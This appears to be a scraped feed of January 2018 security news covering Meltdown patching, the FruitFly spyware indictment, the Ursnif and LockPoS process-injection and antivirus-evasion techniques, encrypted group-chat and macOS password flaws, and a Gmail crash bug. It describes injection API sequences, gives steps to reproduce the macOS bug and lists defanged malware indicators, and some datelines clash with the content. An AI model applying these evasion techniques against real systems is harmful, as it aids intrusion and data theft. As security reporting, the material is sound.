Canonical has confirmed that the fix for the Meltdown vulnerability introduced a regression that prevented systems from booting successfully. The issue has been addressed with the release of new updates that deliver version 4.4.0.109 of the kernel.

Many affected users have confirmed that their systems boot properly after updating to 4.4.0-109. While it’s unclear how many devices have been hit, Canonical’s advisories mention “a few systems.”

Affected tech firms started announcing the availability of patches and workarounds for the Spectre and Meltdown vulnerabilities shortly after the flaws were disclosed by researchers. The latest major companies to release mitigations are IBM, whose POWER processors and Power Systems servers are impacted, and NVIDIA, which released updates for GPU display drivers and other products to help mitigate the CPU issues.

Meltdown and Spectre allow malicious applications to bypass memory isolation mechanisms and access passwords, photos, documents, emails, and other sensitive information. Patches for the underlying vulnerabilities may introduce significant performance penalties.


Mac Malware Creator Indicted in U.S.
11.1.2018 securityweek Apple
“FruitFly” Mac Malware Creator Allegedly Spied On Victims for 13 Years

An Ohio man was charged this week in a 16-count indictment for allegedly developing malware known as “FruitFly” and for infecting thousands of computers with it.

The man, Phillip R. Durachinsky, 28, of North Royalton, Ohio, has been charged with using the malware for more than 13 years to watch, listen to, and obtain personal data from unknowing victims, as well as to produce child pornography.

FruitFly, also known as Quimitchin, was first discovered a year ago, despite being said to have been developed over a decade ago. The malware was supposedly designed to exfiltrate data from anything it can access and its presence on machines at biomedical facilities led researchers to believe it was a cyber-espionage tool. What isn’t yet clear is how the malware was distributed to the compromised systems.

At Virus Bulletin last year, security researcher Patrick Wardle presented a paper on a second variant of FruitFly, explaining that the threat is installed persistently on the victims’ machines, that it employs obfuscation, and that it includes support for a large number of commands. By setting up a custom command and control (C&C) server for the threat, he was also able to observe and analyze the malware’s behavior.

The malware, Wardle revealed, included support for around 25 commands, and supports advanced commands rarely seen in macOS malware, such as the ability to simulate mouse and keyboard events, likely in an attempt to interact with system dialogs or alerts from security products.

Although designed to target Macs, FruitFly was found to contain Linux shell commands and to run just fine on Linux, which suggested that a variant targeting this operating system might have been built as well. Windows-based executable files that communicated with the malware’s C&C were also discovered, and one of them was found to use a libjpeg library that hasn't been updated since 1998, but which FruitFly also uses.

According to the indictment the Department of Justice made public this week, Durachinsky from 2003 through Jan. 20, 2017, allegedly orchestrated a scheme to access “thousands of protected computers owned by individuals, companies, schools, a police department, and the government, including one owned by a subsidiary of the U.S. Department of Energy.”

Using the FruitFly malware, he allegedly controlled infected computers “by accessing stored data, uploading files, taking and downloading screenshots, logging a user’s keystrokes, and turning on the camera and microphone to surreptitiously record images and audio,” DoJ said.

The indictment also alleges that Durachinsky used the malware to steal victims’ personal information, including logon credentials, tax records, medical records, photographs, banking records, Internet searches, and communications. He is also charged with using the stolen credentials to access and download information from third-party websites.

Moreover, Durachinsky is said to have used the compromised systems to watch and listen to victims without their knowledge or permission and to intercept oral communications taking place in the room where the infected computer was located. Durachinsky was apparently alerted if a user typed words associated with pornography and is said to have saved millions of images and to have kept detailed notes of what he saw.

“For more than 13 years, Phillip Durachinsky allegedly infected with malware the computers of thousands of Americans and stole their most personal data and communications,” Acting Assistant Attorney General John P. Cronan of the Justice Department’s Criminal Division said.


CSE Malware ZLab – Double Process Hollowing -The stealth process injection of the new Ursnif malware
11.1.2018 securityaffairs
Virus
pdf

A new variant of the infamous Ursnif malware spread in the wild and adopts a new advanced evasion technique dubbed Double Process Hollowing.
Whereas the malware LockPos, famous for its new incredibly advanced and sophisticated evasion technique, spread and affected many Points of Sale, another variant spread in the wild and adopts a similar but not identical advanced evasion trick. It is likely a new variant of “ursnif v3”, another evolution of an old banking trojan that was spreading since November 2017. Moreover, the command and control of this new malware, oretola[.]at has been sinkholed by authorities, so it is difficult to reconstruct the entire behavior and the real purpose of this malware.

However, it is very interesting to analyze its stealth evasion technique that allows it to be invisible to many modern antivirus software. In fact, its final stage is to hide itself as a thread of “explorer.exe” process and this make the analysis very difficult. To reach its goal, the malware uses a sort of “double process hollowing” technique based on Windows Native API, leveraging the “svchost.exe” system process as a way to make privilege escalation and to get to inject malicious code in “explorer.exe”.

Only after the concealment in “explorer.exe” it starts to make its malicious operations that consist of contacting a series of compromised sites the host encrypted additional payloads. The final step of its malicious behavior is to periodically communicate with its C2C, “oretola[.]at”, where it sends information about the victim host.

This malware probably spreads up through spam mails, the message contains an URL that points to a compromised site on which the sample is hosted. We discovered the malware sample just on one of these compromised sites, in particular it is an Italian blog dedicated to dolls “marinellafashiondolls[.]com/_private/php3.exe”.

Process Hollowing evasion technique

The malware uses almost exclusively the Native API of Windows with also its undocumented functions. The use of them causes a more difficult monitoring by antiviruses.

Once the php3.exe file is executed, it deletes itself from the original path and recopy itself in “%APPDATA%\Roaming\Microsoft\Brdgplua\ddraxpps.exe” path.

Once completed this operation, the malware starts its malicious behavior.

The full report published by researchers at ZLAb details step by step the technique implemented by the malware.


macOS Malware Creator Charged With Spying on Thousands of PCs Over 13 Years
11.1.2017 thehackernews Apple

The U.S. Justice Department unsealed 16-count indictment charges on Wednesday against a computer programmer from Ohio who is accused of creating and installing spyware on thousands of computers for more than 13 years.
According to the indictment, 28-year-old Phillip R. Durachinsky is the alleged author of FruitFly malware that was found targeting Apple Mac users earlier last year worldwide, primarily in the United States.
Interestingly, Durachinsky was just 14 years old when he programmed the first version of the FruitFly malware, and this full-fledged backdoor trojan went largely undetected for several years, despite using unsophisticated and antiquated code.
The malware was initially discovered in January 2017 by Malwarebytes and then Patrick Wardle, an ex-NSA hacker, found around 400 Mac computers infected with the newer strain of FruitFly. However, Wardle believed the number of infected Macs would likely be much higher.
The malware is capable of advanced surveillance on macOS devices with the ability to remotely take control of webcams, microphones, screen, mouse, and keyboards, as well as install additional malicious software.
Since the source code of Fruitfly also includes Linux shell commands, the researchers believe the malware would work just fine on Linux operating system.
From 2003 to January 2017, Durachinsky used spyware, which was later named FruitFly, to gain access to thousands of computers belonging to individuals, companies, schools, a police department, and a subsidiary of the U.S. Department of Energy.
Durachinsky allegedly used the malware to steal the personal data of victims, including their tax records, banking records, medical records, login credentials, photographs, Internet searches, and potentially embarrassing communications.
"He is alleged to have developed computer malware later named “Fruitfly” that he installed on computers and that enabled him to control each computer by accessing stored data, uploading files, taking and downloading screenshots, logging a user’s keystrokes, and turning on the camera and microphone to surreptitiously record images and audio," the DoJ says.
Besides installing Fruitfly, Durachinsky is also accused of producing child pornography, as in some cases, the malware alerted him if a user typed any pornography term. It’s likely such action would prompt recording.
Durachinsky is facing charges of Computer Fraud and Abuse Act violations, Wiretap Act violations, production of child pornography, and aggravated identity theft.
However, the charges are merely allegations at this time, and the defendant is presumed innocent unless proven guilty beyond a reasonable doubt in a court of law.


WhatsApp Flaw Could Allow 'Potential Attackers' to Spy On Encrypted Group Chats
11.1.2017 thehackernews
Social

A more dramatic revelation of 2018—an outsider can secretly eavesdrop on your private end-to-end encrypted group chats on WhatsApp and Signal messaging apps.
Considering protection against three types of attackers—malicious user, network attacker, and malicious server—an end-to-end encryption protocol plays a vital role in securing instant messaging services.
The primary purpose of having end-to-end encryption is to stop trusting the intermediate servers in such a way that no one, not even the company or the server that transmits the data, can decrypt your messages or abuse its centralized position to manipulate the service.
In order words—assuming the worst-case scenario—a corrupt company employee should not be able to eavesdrop on the end-to-end encrypted communication by any mean.
However, so far even the popular end-to-end encrypted messaging services, like WhatsApp, Threema and Signal, have not entirely achieved zero-knowledge system.
Researchers from Ruhr-Universität Bochum (RUB) in Germany found that anyone who controls WhatsApp/Signal servers can covertly add new members to any private group, allowing them to spy on group conversations, even without the permission of the administrator.
As described by the researchers, in the pairwise communication (when only two users communicate with each other) server plays a limited role, but in case of multi-user chats (group chat where encrypted messages are broadcasted to many users), the role of servers increases to manage the entire process.
That's where the issue resides, i.e. trusting the company's servers to manage group members (who eventually have full access to the group conversation) and their actions.
As explained in the newly published RUB paper, titled "More is Less: On the End-to-End Security of Group Chats in Signal, WhatsApp, and Threema," since both Signal and WhatsApp fail to properly authenticate that who is adding a new member to the group, it is possible for an unauthorized person—not a group administrator or even a member of the group—to add someone to the group chat.
What's more? If you are wondering that adding a new member to the group will show a visual notification to other members, it is not the case.
According to the researchers, a compromised admin or rogue employee with access to the server could manipulate (or block) the group management messages that are supposed to alert group members of a new member.
"The described weaknesses enable attacker A, who controls the WhatsApp server or can break the transport layer security, to take full control over a group. Entering the group, however, leaves traces since this operation is listed in the graphical user interface. The WhatsApp server can therefore use the fact that it can stealthily reorder and drop messages in the group," the paper reads.
"Thereby it can cache sent messages to the group, read their content first and decide in which order they are delivered to the members. Additionally, the WhatsApp server can forward these messages to the members individually such that a subtly chosen combination of messages can help it to cover the traces."
WhatsApp has acknowledged the issue, but argued that if any new member is added to a group, let's say by anyone, other group members will get notified for sure.
"We've looked at this issue carefully. Existing members are notified when new people are added to a WhatsApp group. We built WhatsApp so group messages cannot be sent to a hidden user," a WhatsApp spokesperson told Wired.
"The privacy and security of our users is incredibly important to WhatsApp. It's why we collect very little information and all messages sent on WhatsApp are end-to-end encrypted."
But if you are not part of a group with very selected members, I'm sure many of you would relatively ignore such notifications easily.
Researchers also advised companies to fix the issue just by adding an authentication mechanism to make sure that the "signed" group management messages come from the group administrator only.
However, this attack is not easy (exception—services under legal pressure) to execute, so users should not be worried about it.


[Bug] macOS High Sierra App Store Preferences Can Be Unlocked Without a Password
11.1.2017 thehackernews Apple

Yet another password vulnerability has been uncovered in macOS High Sierra, which unlocks App Store System Preferences with any password (or no password at all).
A new password bug has been discovered in the latest version of macOS High Sierra that allows anyone with access to your Mac to unlock App Store menu in System Preferences with any random password or no password at all.
The impact of this vulnerability is nowhere as serious as the previously disclosed root login bug in Apple's desktop OS that enabled access to the root superuser account simply by entering a blank password on macOS High Sierra 10.13.1.
As reported on Open Radar earlier this week, the vulnerability impacts macOS version 10.13.2 and requires the attacker to be logged in with an administrator-level account for this vulnerability to work.
I checked the bug on my fully updated Mac laptop, and it worked by entering a blank password as well as any random password.
If you're running latest macOS High Sierra, check yourself:
Log in as a local administrator
Go to System Preferences and then App Store
Click on the padlock icon (double-click on the lock if it is already unlocked)
Enter any random password (or leave it blank) in login window
Click Unlock, Ta-da!
Once done, you'll gain full access to App Store settings, allowing you to modify settings like disabling automatic installation of macOS updates, app updates, system data files and even security updates that would patch vulnerabilities.
We also tried to reproduce the same bug on the latest developer beta 4 of macOS High Sierra 10.13.3, but it did not work, suggesting Apple probably already knows about this issue and you'll likely get a fix in this upcoming software update.
What's wrong with password prompts in macOS? It's high time Apple should stop shipping updates with such an embarrassing bug.
Apple also patched a similar vulnerability in October in macOS, which affected encrypted volumes using APFS wherein the password hint section was showing the actual password of the user in the plain text.


A security issue in WhatsApp potentially allows attackers to eavesdrop on encrypted Group chats
11.1.2017 securityaffairs  Krypto

An attacker can secretly eavesdrop on your private end-to-end encrypted group chats on WhatsApp, Threema and Signal messaging apps.
Even if the messaging services implement end-to-end encryption, an attacker or someone in the company that provides the service can decrypt your messages.

A Group of researchers from Ruhr-Universität Bochum (RUB) in Germany discovered that anyone who controls WhatsApp/Signal servers can covertly add new members to any private group without permission of the administrator, with this trick it is possible to spy on group conversations.

In case of multi-user chats, the servers manage the entire communication process.

“Contrary to classical multi-user chats, for example, to IRC in which all members are online, groups in IM protocols must work in asynchronous settings; Groups must be createable and messages must be deliverable even if some group members are offline” reads the paper published by the researchers, titled “More is Less: On the End-to-End Security of Group Chats in Signal, WhatsApp, and Threema,”

“We observed two shortcomings in the design of WhatsApp’s group protocol that allow to (1) burgle into a group and to (2) forge acknowledgments. The shortcomings have similar results as the attacks on Signal, although the underlying protocol and exploitation differ”

The experts discovered that both Signal and WhatsApp fail to properly authenticate an entity that is adding a new member to the group, this means that an unauthorized user that is not a group administrator or even a member of the group can add a member to the group conversations.

Experts also discovered that it is possible to add a new member without notifying the action to other members, this is possible because a rogue admin or employee with access to the server could manipulate (or block) the group management messages.

The abilities to burgle into a group and to forge acknowledgments could be chained to allow an attacker who controls the WhatsApp server or can break the transport layer security to fully control group activities.

“The described weaknesses enable attacker A, who controls the WhatsApp server or can break the transport layer security, to take full control over a group. Entering the group, however, leaves traces since this operation is listed in the graphical user interface. The WhatsApp server can therefore use the fact that it can stealthily reorder and drop messages in the group,” explained the researchers.

“Thereby it can cache sent messages to the group, read their content first and decide in which order they are delivered to the members. Additionally, the WhatsApp server can forward these messages to the members individually such that a subtly chosen combination of messages can help it to cover the traces.”

According to WhatsApp, the situation is quite different because if any new member is added to a group other group members will receive a notification.

“We’ve looked at this issue carefully. Existing members are notified when new people are added to a WhatsApp group. We built WhatsApp so group messages cannot be sent to a hidden user,” a WhatsApp spokesperson told Wired.

“The privacy and security of our users is incredibly important to WhatsApp. It’s why we collect very little information and all messages sent on WhatsApp are end-to-end encrypted.”

The RUB team also provide recommendations to the companies that are suggested to solve the issue by adding an authentication mechanism to group management messages, in this way only legitimate administrators can manage the activities of multi chats.

The Ruhr University researchers reported findings of their investigation to WhatsApp in July, in response to their report, WhatsApp fixed one problem with a feature of their encryption that made it harder to crack future messages even after an attacker obtained one decryption key.

“But they told the researchers the group invitation bug they’d found was merely “theoretical” and didn’t even qualify for the so-called bug bounty program run by Facebook, WhatsApp’s corporate owner, in which security researchers are paid for reporting hackable flaws in the company’s software.” continues Wired.

As said the experts also investigated Threema and Signal.

For Threema, the researchers found minor flaws, an attacker who controls the server can replay messages or add users to a group who have been removed. Once informed of the issues, Threema released a version to address the issues.

For Signal the attack is more difficult because the attacker would have to not only control the Signal server but also know an unguessable number called the Group ID. This means that to carry on the attack it is necessary the knowledge of the Group ID that can be obtained from one of the group member’s devices, in this case, the group is likely already compromised.


Italian researcher discovered that Gmail shutdown after sending a Zalgo text
11.1.2018 securityaffairs
Vulnerebility

Researchers at security firm We Are Segment have discovered a vulnerability in Gmail, a “distorted” message shuts down the most famous webmail in the world.
This Cybersec company We Are Segment, part of the Interlogica group, discovered a severe vulnerability in Gmail.

Last month the Italian firm made the headlines due to the discovery of the Tormoil vulnerability.

The flaw in Gmail was discovered by the white hat hacker Roberto Bindi, the flaw could be exploited to shut down Gmail by sending to the victim a specially crafted message, impeding the user from accessing his/her email address.

“The test was born out of curiosity. Roberto wanted to see what would have happened if a Zalgo text was injected into a web browser.” reads the press release published by the company.

A Zalgo text is a type of text composed of characters and metacharacters (letters, numbers and other symbols) which extend sideways – above and under – the original text, thanks to the effect produced by the standard Unicode combiners.

The first experiment conducted by the expert demonstrated that the insertion of a Zalgo text (which can also be generated by web applications) containing a great number of metacharacters (more than 1.000.000) triggered the browser crash, namely, the web browser shut down for a few minutes. gmail

Despite the already interesting results, Roberto Bindi didn’t stop there, he decided to send a Zalgo text via Gmail again, expecting another browser crash. Unfortunately, he couldn’t even imagine what kind of results this test would reveal.

What he managed to discover surpassed his imagination: it wasn’t the browser crashing; instead, it was Gmail itself.
The email is effectively received by the recipient, but he cannot open it and, after just a few moments, Gmail shuts down showing the “Error 500” message (internal server failure due to unspecified reasons, like an irreversible code error).

The young researcher managed to find a technical artifice to bypass the block and reactivate the email account, in order to repeat the experiment and verify the duration of the Gmail shutdown. He discovered that the account went down for 4 entire days.

Since this discovery, Roberto decided to contact the Google’s team. After a few weeks, the team communicated that they had begun working on the issue.

“After discovering that by sending a series of special characters the Google’s mail system stopped working, I started worrying about the possible consequences and damages that this vulnerability might have caused when publicized. An ill-intentioned person might have blocked email accounts like “purchases@…” or other work emails, by sending a simple email.” explained Roberto Bindi.
“That’s why my company decided to publish this piece of information only after the issue had been solved by Google. Our choice was based on ethics and it mirrors our company’s ethics code, underlining how WeAreSegment is formed by ethical
hackers”

This Gmail vulnerability discovered by the researcher Roberto Bindi demonstrates how research is one of the most important aspects of cyber security.

“Thanks to this activity, we can directly contribute to the Cyber Security improvement worldwide” – says Filippo Cavallarin, We Are Segment CEO.


New Malware Dubbed LockPos Introduces New Injection Technique To Avoid Detection
11.1.2018 securityaffairs
Virus

Security Researchers from Cyberbit have discovered a new malware injection technique being used by a variant of Flokibot malware named LockPoS.
A Point of Sale (PoS) malware is a malicious application that steals credit card data from the memory of computers connected to credit card equipment. Once infected the system, the LockPoS malware tries to gain access and read the memory of the current process in use and begin to search for data that have the pattern of credit card information to send to its command and control server.

“Cyberbit malware researchers recently discovered a stealthy new malware injection technique being used by LockPoS that appears to be a new variant of that used by Flokibot.” reads the analysis published by CyberBit.

“LockPoS is a Point-of-Sale (PoS) malware that steals credit card data from the memory of computers attached to point of sale credit card scanners. LockPos reads the memory of currently running processes on the system, searching for data that looks like credit card information and then sends them to the C&C.”

The same botnet associated with the propagation of Flokibot is being used by LockPoS and its source code have some similarities. In that regard, it is important to notice that the malware has some stages to unpack and decryption with different techniques and routines to call the API for injection-related with Flokibot.

There are three main routines used by PoS malware discovered by CyberBit to inject code in the remote process: NtCreateSection, NtMapViewOfSection, and NtCreateThreadEx. A core dll file native to Windows System, ntdll.dll, is used in the injection technique. The routines related with ntdll that have a “NT” prefix are associated with Windows API that separates user space from kernel space. The injection technique involves the creation of a section object in the kernel with the use of NtCreateSection to call NtMapViewOfSection as a map to view the section in other process and then copy the code into the section and create a remote thread by using NtCreateThreadEx or CreateRemoteThread to execute the code.

Once a routine from ntdll is called the hexadecimal value of the system call is copied to the EAX register, where a instruction is called to make the thread jump to the kernel mode. The kernel then executes the routine based on the value of EAX register. The parameters from the user stack are copied to the kernel stack and executed.

The malware does not call the routines from ntdll to inject code avoiding Anti Virus detection, instead, it maps the routines from ntdll on the disk to its own virtual address space. By doing so the malware maintains a clean copy of dll that is not detected by anti-virus software.

Also, as Cyberbit researchers noticed, a call to NtMapViewOfSection is handled by the malware for the process of explorer.exe.

“One LockPoS malware injection technique involves creating a section object in the kernel using NtCreateSection, calling NtMapViewOfSection to map a view of that section into another process, copying code into that section and creating a remote thread using NtCreateThreadEx or CreateRemoteThread to execute the mapped code.” continues the analysis.

lockpos

The security researchers report also notice that improving memory analysis is the only effective way to detection since Windows 10 kernel functions can’t be monitored.

Sources:

https://www.cyberbit.com/new-lockpos-malware-injection-technique/
https://www.scmagazine.com/lockpos-malware-adopts-injection-technique-to-evade-detection/article/735425/
https://www.infosecurity-magazine.com/news/lockpos-takes-a-page-from-flokibot/
http://www.securityweek.com/lockpos-adopts-new-injection-technique
https://www.scmagazineuk.com/lockpos-malware-adopts-injection-technique-to-evade-detection/article/735729/
http://newsroom.trendmicro.com/news/endpoint/lockpos-malware-sneaks-onto-kernel-via-new-injection-technique/d/d-id/1330757
https://securityonline.info/lockpos-malware-use-new-injection-technology-to-sneaks-onto-kernel/
https://vulners.com/threatpost/NEW-POINT-OF-SALE-MALWARE-LOCKPOS-HITCHES-RIDE-WITH-FLOKIBOT/126795
https://www.darkreading.com/endpoint/lockpos-malware-sneaks-onto-kernel-via-new-injection-technique/d/d-id/1330757